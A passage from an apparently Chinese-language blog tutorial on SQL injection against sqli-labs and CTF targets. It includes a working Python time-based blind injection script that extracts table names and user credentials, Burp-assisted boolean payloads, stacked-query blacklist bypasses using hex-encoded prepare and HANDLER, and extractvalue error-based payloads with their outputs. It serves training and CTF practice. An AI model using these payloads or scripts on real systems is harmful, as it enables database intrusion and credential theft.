&nbsp;print('[+]%s' % dump_data) &nbsp;# \u8f93\u51fa\u6bcf\u6761\u6570\u636e<br>\u200b<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;url = \"http:\/\/192.168.184.103\/sqli-labs\/Less-5\/?id=1\" &nbsp;# \u76ee\u6807url<br> &nbsp; &nbsp;str = \"You are in\" &nbsp;# \u5e03\u5c14\u578b\u76f2\u6ce8\u7684true&amp;false\u7684\u5224\u65ad\u56e0\u7d20<br> &nbsp; &nbsp;db_length(url, str) &nbsp;# \u7a0b\u5e8f\u5165\u53e3<br>\u200b<\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>\u5f15\u7528:<a 
href=\"https:\/\/blog.csdn.net\/mochu7777777\/article\/details\/104825456?ops_request_misc={%22request_id%22%3A%22162384812616780265499873%22%2C%22scm%22%3A%2220140713.130102334..%22}&amp;request_id=162384812616780265499873&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-104825456.first_rank_v2_pc_rank_v29&amp;utm_term=\u5e03\u5c14\u76f2\u6ce8+\u811a\u672c&amp;spm=1018.2226.3001.4187\">\u5e03\u5c14\u578b\u76f2\u6ce8Python\u811a\u672c<em>\u672b\u521d \u00b7 mochu7-CSDN\u535a\u5ba2<\/em>bool\u76f2\u6ce8\u811a\u672c<\/a><\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">\u624b\u5de5 POST\u65b9\u5f0f<\/h3>\n\n\n\n<p>\u7528burpsuite\u65b9\u5f0f\u8f85\u52a9\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<p>\u53ea\u6709\u4e00\u4e2a\u7206\u7834\u70b9\u9009\u62e9Snipper\uff0c\u4e24\u4e2a\u7206\u7834\u70b9\u9009\u62e9Cluster bomb<\/p>\n\n\n\n<p><strong>\u5224\u65ad\u6570\u636e\u5e93\u957f\u5ea6<\/strong><\/p>\n\n\n\n<p>admin&#8217; and length(database())=<code>8<\/code># \u5b57\u7b26\u578b \u5176\u4e2d\u5c068\u6570\u5b57\u8bbe\u7f6e\u7206\u7834\u70b9<\/p>\n\n\n\n<p>1 and length(database())=<code>8<\/code># \u6570\u5b57\u578b<\/p>\n\n\n\n<p><strong>\u7206\u6570\u636e\u5e93<\/strong><\/p>\n\n\n\n<p>admin&#8217; and ascii(substr(database(),<code>1<\/code>,1))=<code>100<\/code># \u5b57\u7b26\u578b \u5176\u4e2d\u5c061\u548c100\u8bbe\u7f6e\u7206\u7834\u70b9 1\u4e3a\u7206\u6570\u636e\u5e93\u540d\u7684\u7b2c\u4e00\u4f4d\uff0c\u6570\u5b57\u5faa\u73af\u8bbe\u7f6e\u4e3a\u6570\u636e\u5e93\u540d\u7684\u957f\u5ea6\uff1b100\u4e3aASCII\u7801\uff0c\u8bbe\u7f6e65-122(\u5927\u5199\u5b57\u6bcdA\u5230\u5c0f\u5199\u5b57\u6bcdz)<\/p>\n\n\n\n<p><strong>\u7206\u8868<\/strong><\/p>\n\n\n\n<p>\u7206\u8868\u6570\u91cf<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from information_schema.tables where 
table_schema=database())=<code>4<\/code>#<\/p>\n\n\n\n<p>4\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u8868\u540d<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), <code>1<\/code>,1))=<code>100<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u5c061\u548c100\u8bbe\u7f6e\u7206\u7834\u70b9 1\u4e3a\u7206\u6570\u636e\u5e93\u540d\u7684\u7b2c\u4e00\u4f4d\uff0c\u6570\u5b57\u5faa\u73af\u8bbe\u7f6e\u4e3a\u6570\u636e\u5e93\u540d\u7684\u957f\u5ea6\uff1b100\u4e3aASCII\u7801\uff0c\u8bbe\u7f6e65-122(\u5927\u5199\u5b57\u6bcdA\u5230\u5c0f\u5199\u5b57\u6bcdz)<\/p>\n\n\n\n<p>\u5176\u4e2d\u7206\u7b2c\u4e00\u4e2a\u8868\u4e3alimit 0,1 \u5982\u679c\u8981\u7206\u7b2c\u4e8c\u4e2a\u8868\u4e3alimit 1,1<\/p>\n<\/blockquote>\n\n\n\n<p><strong>\u7206\u5b57\u6bb5<\/strong><\/p>\n\n\n\n<p>\u7206\u5b57\u6bb5\u6570<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from information_schema.columns where table_schema=&#8221;security&#8221; and table_name=&#8221;users&#8221;)=<code>3<\/code>#<\/p>\n\n\n\n<p>3\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9\uff0c\u7206\u7834\u5b57\u6bb5\u6570\u91cf<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u540d\u79f0\u957f\u5ea6<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and length((select column_name from information_schema.columns where table_name=&#8221;users&#8221; and table_schema=&#8221;security&#8221; limit 0,1))=<code>2<\/code>#<\/p>\n\n\n\n<p>2\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9\uff0c\u7206\u5b57\u6bb5\u957f\u5ea6<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u540d\u79f0<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select column_name from information_schema.columns where table_name=&#8221;users&#8221; and table_schema=&#8221;security&#8221; limit 
0,1),<code>1<\/code>,1))=<code>1<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u7b2c\u4e00\u4e2a\u7206\u7834\u70b9\u4e3a\u5b57\u6bb5\u7b2c\u51e0\u4f4d\uff0c\u7b2c\u4e8c\u4e2a\u7206\u7834\u70b9\u4e3aASCII\u7801<\/p>\n\n\n\n<p>\u7206\u7b2c\u4e00\u4e2a\u5b57\u6bb5\u4e3alimit 0,1 \u540c\u7406\u7b2c\u4e8c\u4e2a\u4e3alimit 1,1<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u6570\u91cf<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from users)=<code>13<\/code>#<\/p>\n\n\n\n<p>13\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u503c\u957f\u5ea6<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and length((select username from users limit 0,1))=<code>10<\/code>#<\/p>\n\n\n\n<p>10\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u503c<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select username from users limit 0,1),<code>1<\/code>,1))=<code>68<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u7b2c\u4e00\u4e2a\u7206\u7834\u70b9\u4e3a\u5b57\u6bb5\u503c\u7b2c\u51e0\u4f4d\uff0c\u7b2c\u4e8c\u4e2a\u7206\u7834\u70b9\u4e3aASCII\u7801<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u51fa\u7684flag\u592a\u957f\uff0c\u53ef\u4ee5\u590d\u5236\u5230excel\u91cc\uff0c\u7136\u540e\u6392\u5e8fflag\u7684\u987a\u5e8f\uff0c\u7136\u540e\u4f7f\u7528\u811a\u672c\u6279\u91cf\u8f6c\u6362\u5b57\u7b26<\/p>\n\n\n\n<p>\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">def ascii_to_char(ascii_str):<br> &nbsp; &nbsp;return ''.join(chr(int(ascii)) for ascii in ascii_str.split())<br>\u200b<br>ascii_code = \"102 108 97 103 58 100 56 49 98 54 54 51 56 48 52 102 102 56 50 100 51 50 98 100 54 55 99 48 52 54 98 97 49 97 48 52 102 58\"<br>char_str = ascii_to_char(ascii_code)<br>print(char_str) &nbsp;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8<\/h2>\n\n\n\n<blockquote 
class=\"wp-block-quote\">\n<p><strong>\u9996\u5148\u6211\u89c9\u5f97\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\u548c\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\u7684\u6700\u76f4\u89c2\u7684\u5dee\u522b\u5c31\u662f\u201c\u53c2\u7167\u7269\u201d\u4e0d\u540c\uff0c\u4e5f\u5c31\u662f\u8bf4\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5176\u5b9e\u662f\u53ef\u4ee5\u901a\u8fc7\u9875\u9762\u7684\u4e00\u4e9b\u53d8\u5316\u6765\u8fdb\u884c\u5224\u65ad\u7ed3\u679c\uff01\u4f46\u662f\u6709\u7684\u65f6\u5019\uff0c\u6267\u884c\u4e00\u4e9bsql\u8bed\u53e5\u7684\u6d4b\u8bd5\uff0c\u9875\u9762\u4e0d\u4f1a\u6709\u50cf\u5e03\u5c14\u76f2\u6ce8\u7684\u65f6\u5019\u6bd4\u8f83\u76f4\u89c2\u7684\u53d8\u5316\uff0c\u6240\u4ee5\u8fd9\u4e2a\u65f6\u5019\u6240\u8c13\u7684\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u4e5f\u5c31\u662f\u5728\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\u4e0a\u7ed3\u5408if\u5224\u65ad\u548csleep\uff08\uff09\u51fd\u6570\u6765\u5f97\u5230\u4e00\u4e2a\u65f6\u95f4\u4e0a\u7684\u53d8\u6362\u5ef6\u8fdf\u7684\u53c2\u7167\uff0c\u4e5f\u5c31\u53ef\u4ee5\u8ba9\u6211\u4eec\u8fdb\u884c\u4e00\u4e9b\u5224\u65ad\u3002<\/strong><\/p>\n<\/blockquote>\n\n\n\n<ul>\n<li>\u9996\u5148\u5224\u65ad\u662f\u5426\u4e3a\u65f6\u95f4\u76f2\u6ce8\u65f6\u95f4\u76f2\u6ce8\u65e0\u8bbaid\u540e\u8f93\u4ec0\u4e48\u9875\u9762\u90fd\u6ca1\u6709\u53d8\u5316\uff0c\u901a\u8fc7sleep\u51fd\u6570\u5f97\u5230\u65f6\u95f4\u4e0a\u7684\u53d8\u5316\u6765\u5224\u65ad\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u7136\u540e\u5224\u65ad\u6570\u5b57\u540e\u662f\u5355\u5f15\u53f7\u8fd8\u662f\u53cc\u5f15\u53f7\u95ed\u5408\u65b9\u5f0f?id=1&#8243; and if(ascii(substr(database(),1,1))&gt;115,1,sleep(3))&#8211;+\u4fee\u65391\u540e\u9762\u7684\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7<\/li>\n\n\n\n<li>\u5f97\u5230\u95ed\u5408\u65b9\u5f0f\u540e\uff0c\u4fee\u6539payload\uff0c\u7528\u811a\u672c\u8dd1<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">GET\u65b9\u5f0f<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">import 
requests<br>import time<br>import string<br>import sys<br>\u200b<br>headers = {\"user-agent\": \"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\"}<br>\u200b<br>chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'<br>\u200b<br>database = ''<br>\u200b<br>length = 1<br>\u200b<br>url = 'http:\/\/192.168.184.103\/sqli-labs\/Less-6\/?id=1\\\"'<br>\u200b<br>for l in range(1, 20):<br> &nbsp; &nbsp;payload = ' and if(length(database())&gt;{0},1,sleep(3))--+'.format(l)<br>\u200b<br> &nbsp; &nbsp;start_time0 = time.time()<br> &nbsp; &nbsp;rsp0 = requests.get(url+payload, headers=headers)<br> &nbsp; &nbsp;if time.time() - start_time0 &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp;print('\u6570\u636e\u5e93\u957f\u5ea6\u4e3a\uff1a' + str(l))<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;length = l<br> &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp;pass<br>\u200b<br>for i in range(1,length + 1):<br>\u200b<br> &nbsp; &nbsp;for char in chars:<br> &nbsp; &nbsp; &nbsp; &nbsp;charAscii = ord(char)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(substr(database(),{0},1))&gt;{1},1,sleep(3))--+'.format(i, charAscii)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time = time.time()<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;rsp = requests.get(url+payload, headers=headers)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;database += char<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br>print('\u6570\u636e\u5e93\u540d\u5b57\u4e3a\uff1a' + database)<br>\u200b<br>table = ''<br>for i in range(1, 30):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(3),1)--+'.format(i, j)<br> 
&nbsp; &nbsp; &nbsp; &nbsp;start_time = time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;rsp1 = requests.get(url+payload, headers=headers)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u6570\u636e\u5e93\u4e2d\u7684\u8868\u6709\uff1a' + table)<br>#<br>field = ''<br>for i in range(1, 50):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = \" and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={},sleep(3),1)--+\".format(i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time=time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(url+payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;field += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u8868\u4e2d\u7684\u5b57\u6bb5\u6709\uff1a' + field)<br>\u200b<br>flag = ''<br>for i in range(1, 50):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(substr((select group_concat(username,\\'~\\',password) from users),{0},1))={1},sleep(3),1)%23--+'.format(i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time=time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(url+payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u8868\u4e2d\u5b57\u6bb5\u503c\u4e3a\uff1a' + flag)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">POST\u65b9\u5f0f<\/h3>\n\n\n\n<p>\u7528sqlmap<\/p>\n\n\n\n<p><a 
href=\"https:\/\/blog.csdn.net\/qq_53079406\/article\/details\/125647160\">\uff08sqlmap\uff09\u3010sqli-labs8-10\u3011\u76f2\u6ce8\uff1a\u5e03\u5c14\u76f2\u6ce8\u3001\u65f6\u95f4\u76f2\u6ce8_sqlmap\u76f2\u6ce8\u547d\u4ee4-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p>\u8e29\u5751\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">POST \/check HTTP\/1.1<br>Host: scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com<br>Sec-Ch-Ua-Platform: \"Windows\"<br>Referer: https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com\/<br>Cookie: connect.sid=s%3A4SmkQ_acvmz1aCG9ccDmgU5S2L7-gx6G.WQun58WK3z7z4tQutr8Byl8kco7vOilKJsFEU7UowxE<br>Sec-Ch-Ua: \"Not=A?Brand\";v=\"99\", \"Chromium\";v=\"118\"<br>Accept: *\/*<br>X-Requested-With: XMLHttpRequest<br>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br>Origin: https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com<br>Sec-Fetch-Dest: empty<br>Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<br>Sec-Fetch-Site: same-origin<br>Accept-Language: en-US,en;q=0.9<br>Connection: keep-alive<br>Content-Length: 5<br>Sec-Ch-Ua-Mobile: ?0<br>Sec-Fetch-Mode: cors<br>\u200b<br>id=15<\/pre>\n\n\n\n<p>\u6ce8\u610f\u8fd9\u6bb5<code>HTTP\/1.1<\/code> \u4f46\u539f\u7f51\u5740\u662f<code>https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com\/<\/code><\/p>\n\n\n\n<p>\u6240\u4ee5\u5728sqlmap\u4e2d\u8981\u5f3a\u5236\u4f7f\u7528HTTPS <code>--force-ssl<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5806\u53e0\u6ce8\u5165<\/h2>\n\n\n\n<h3 
class=\"wp-block-heading\">\u6f0f\u6d1e\u6210\u56e0<\/h3>\n\n\n\n<ul>\n<li>\u4f7f\u7528<code>mysqli_multi_query()<\/code>\u8fd9\u79cd\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u51fd\u6570<\/li>\n\n\n\n<li>\u4f7f\u7528PDO\u7684\u65b9\u5f0f\u8fdb\u884c\u6570\u636e\u67e5\u8be2\uff0c\u521b\u5efaPDO\u5b9e\u4f8b\u65f6<code>PDO::MYSQL_ATTR_MULTI_STATEMENTS<\/code>\u8bbe\u7f6e\u4e3a<code>true<\/code>\u65f6\uff0c\u53ef\u4ee5\u6267\u884c\u591a\u8bed\u53e5<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">bypass\u6280\u5de7<\/h3>\n\n\n\n<p>\u4ee5[GYCTF2020]Blacklist\u4e3a\u4f8b <code>preg_match(\"\/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\.\/i\",$inject)<\/code><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u83b7\u53d6\u6570\u636e\u5e93\u540d\u3001\u8868\u540d\u3001\u5217\u540d<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>show databases;<br>show tables;<br>show columns from `table_name`;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">\u4fee\u6539\u8868\u540d<\/h4>\n\n\n\n<p>\u6b64\u65f6\u62fc\u63a5sql\u8bed\u53e5\u7684\u4ee3\u7801\u80af\u5b9a\u662f\u56fa\u5b9a\u4ece\u4e00\u4e2a\u8868\u91cc\u53d6\u51fa\u67d0\u5217\u7684\u6570\u636e\uff0c\u8fd9\u65f6\u5019\u6211\u4eec\u4fee\u6539\u8868\u540d\uff0c\u53d6\u51fa\u6570\u636e\u6765<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>1\u3001\u5c06words\u8868\u540d\u66ff\u6362\u6210\u5176\u4ed6\u7684<\/p>\n\n\n\n<p>2\u3001\u7136\u540e\u5c06 <code>1919810931114514<\/code> \u8fd9\u4e2a\u8868\u540d\u79f0\u66ff\u6362\u6210words<\/p>\n\n\n\n<p>3\u3001\u5728\u628aflag\u8fd9\u4e2a\u5b57\u6bb5\u66ff\u6362\u6210data<\/p>\n\n\n\n<p>4\u3001\u6700\u540e\u518d\u63d2\u5165\u4e00\u4e2aid\u5b57\u6bb5<\/p>\n\n\n\n<p>\u6700\u7ec8\u7684\u67e5\u8be2\u7ed3\u679c\u5c31\u53ef\u4ee5\u8f93\u51fa\u6211\u4eec\u6784\u9020\u7684\u65b0\u7684words\u4e86<\/p>\n<\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>alter table words rename to words1;<br>alter table `1919810931114514` rename to words;<br>alter table 
words change flag id varchar(50);#<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u7528&nbsp; 1&#8242; or 1=1# \u3000\u3000\u628aflag\u6253\u5370\u51fa\u6765<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u9884\u7f16\u8bd1<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;<br>prepare execsql from @a;<br>execute execsql;#<\/code><\/pre>\n\n\n\n<p>\u752816\u8fdb\u5236\u7ed5\u8fc7<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Handler<\/h4>\n\n\n\n<p>\u5728\u8fd9\u6b21\u6bd4\u8d5b\u4e2d<code>set<\/code>\uff0c<code>rename<\/code>\u90fd\u88ab\u8fc7\u6ee4\uff0c\u7528handler\u7ed5\u8fc7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>HANDLER FlagHere OPEN;<br>HANDLER FlagHere READ FIRST;<br>HANDLER FlagHere CLOSE;#<\/code><\/pre>\n\n\n\n<p><code>HANDLER ... OPEN<\/code>\u8bed\u53e5\u6253\u5f00\u4e00\u4e2a\u8868\uff0c\u4f7f\u5176\u53ef\u4ee5\u4f7f\u7528\u540e\u7eed<code>HANDLER ... READ<\/code>\u8bed\u53e5\u8bbf\u95ee\uff0c\u8be5\u8868\u5bf9\u8c61\u672a\u88ab\u5176\u4ed6\u4f1a\u8bdd\u5171\u4eab\uff0c\u5e76\u4e14\u5728\u4f1a\u8bdd\u8c03\u7528<code>HANDLER ... 
CLOSE<\/code>\u6216\u4f1a\u8bdd\u7ec8\u6b62\u4e4b\u524d\u4e0d\u4f1a\u5173\u95ed<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u62a5\u9519\u6ce8\u5165<\/h2>\n\n\n\n<p><strong>extractvalue\u548cupdatexml<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">extractvalue<\/h3>\n\n\n\n<p>extractvalue \u53ea\u8981\u4ee5#\u6216\u8005~\u5f00\u5934\u7684\u5185\u5bb9\uff0c\u4e0d\u662fxml\u683c\u5f0f\u7684\u8bed\u6cd5\uff0c\u4f1a\u62a5\u9519\uff0c\u4f46\u662f\u4f1a\u663e\u793a\u65e0\u6cd5\u8bc6\u522b\u7684\u5185\u5bb9\u662f\u4ec0\u4e48<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mysql&gt; select extractvalue(1,concat(0x7e,(select database()),0x7e))<br>ERROR 1105 (HY000): XPATH syntax error: ~security~<\/pre>\n\n\n\n<p>\u5176\u4e2d0x7e\u662f~\u7684\u7f16\u7801\uff0c\u524d\u540e\u90fd\u6709\u662f\u56e0\u4e3a\u5224\u65ad\u62a5\u9519\u663e\u793a\u7684\u5185\u5bb9\u662f\u5426\u5b8c\u6574<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u793a\u4f8b<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u6570\u636e\u5e93<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select database()),0x7e))<br>XPATH syntax error: &amp;#39;~tarman_db~&amp;#39;<\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u8868\u540d<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\"tarman_db\"),0x7e))<br>XPATH syntax error: &amp;#39;~tw_admin,tw_order~&amp;#39;<\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u5217\u540d<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\"tw_admin\"),0x7e))<br>XPATH syntax error: 
&amp;#39;~id,email,username,nickname,mobl&amp;#39;<\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u663e\u793a\u6ca1\u6709\u5168\uff0c\u8fd9\u65f6\u5019\u5c31\u7528limit\u51fd\u6570\u4e00\u4e2a\u4e00\u4e2a\u7206<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 0,1),0x7e))<br>XPATH syntax error: &amp;#39;~id~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 1,1),0x7e))<br>XPATH syntax error: &amp;#39;~email~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 2,1),0x7e))<br>XPATH syntax error: &amp;#39;~username~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 5,1),0x7e))<br>XPATH syntax error: &amp;#39;~password~&amp;#39;<\/pre>\n\n\n\n<p>\u7206\u51fa\u6211\u4eec\u8981\u7684\u5b57\u6bb5password<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u7206flag<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select password from tw_admin),0x7e))<br>XPATH syntax error: &amp;#39;~flag:3b35751a1e4fe9d94b774e5f37&amp;#39;<\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230flag\u4e5f\u6ca1\u6709\u663e\u793a\u5168\uff0c\u5c31\u8981\u7528\u5230mid\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select mid(password,1,25) from tw_admin),0x7e))<br>XPATH syntax error: &amp;#39;~flag:3b35751a1e4fe9d94b77~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select mid(password,26,50) from tw_admin),0x7e))<br>XPATH syntax error: 
&amp;#39;~4e5f373fa2a1:~&amp;#39;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u5e38\u7528\u51fd\u6570<\/h3>\n\n\n\n<p><strong>concat()<\/strong>\uff1a\u7528\u4e8e\u5c06\u591a\u4e2a\u5b57\u7b26\u4e32\u8fde\u63a5\u6210\u4e00\u4e2a\u5b57\u7b26\u4e32\u3002concat(str1,str2,..)<\/p>\n\n\n\n<p><strong>group_concat()<\/strong>\uff1a\u8fd4\u56de\u4e00\u4e2a\u5b57\u7b26\u4e32\u7ed3\u679c\uff0c\u8be5\u7ed3\u679c\u7531\u5206\u7ec4\u4e2d\u7684\u503c\u8fde\u63a5\u7ec4\u5408\u800c\u6210<\/p>\n\n\n\n<p><strong>limit n,m<\/strong>\uff1a\u7b2c\u4e00\u6b21\u53c2\u6570n\u8868\u793a\u7684\u6e38\u6807\u7684\u504f\u79fb\u91cf\uff0c\u521d\u59cb\u503c\u4e3a0\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570m\u8868\u793a\u60f3\u8981\u83b7\u53d6\u591a\u5c11\u6761\u6570\u636e<\/p>\n\n\n\n<p>limit 0,1\uff1a\u4ece\u7b2c\u4e00\u6761\u8bb0\u5f55\u5f00\u59cb\uff0c\u53ea\u53d6\u4e00\u6761<\/p>\n\n\n\n<p><strong>mid(x,n,m)<\/strong>\uff1a\u4ece\u4e00\u4e2a\u5b57\u7b26\u4e32\u4e2d\u622a\u53d6\u51fa\u6307\u5b9a\u6570\u91cf\u7684\u5b57\u7b26<\/p>\n\n\n\n<p>mid(abcd,1,2) \u622a\u53d6ab<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5c0f\u77e5\u8bc6\u70b9 \u7cfb\u7edf\u51fd\u6570 version()\u2014\u2014MySQL \u7248\u672c user()\u2014\u2014\u6570\u636e\u5e93\u7528\u6237\u540d database() 
